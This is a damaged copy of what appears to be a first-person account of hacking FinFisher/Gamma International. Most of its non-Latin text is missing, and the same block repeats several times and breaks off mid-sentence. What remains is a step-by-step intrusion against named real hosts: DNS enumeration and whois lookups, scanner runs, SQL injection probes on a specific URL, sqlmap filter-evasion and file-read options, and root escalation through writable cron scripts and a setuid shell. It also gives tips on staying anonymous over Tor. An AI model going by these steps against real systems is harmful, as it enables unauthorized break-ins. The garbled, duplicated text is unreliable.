C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
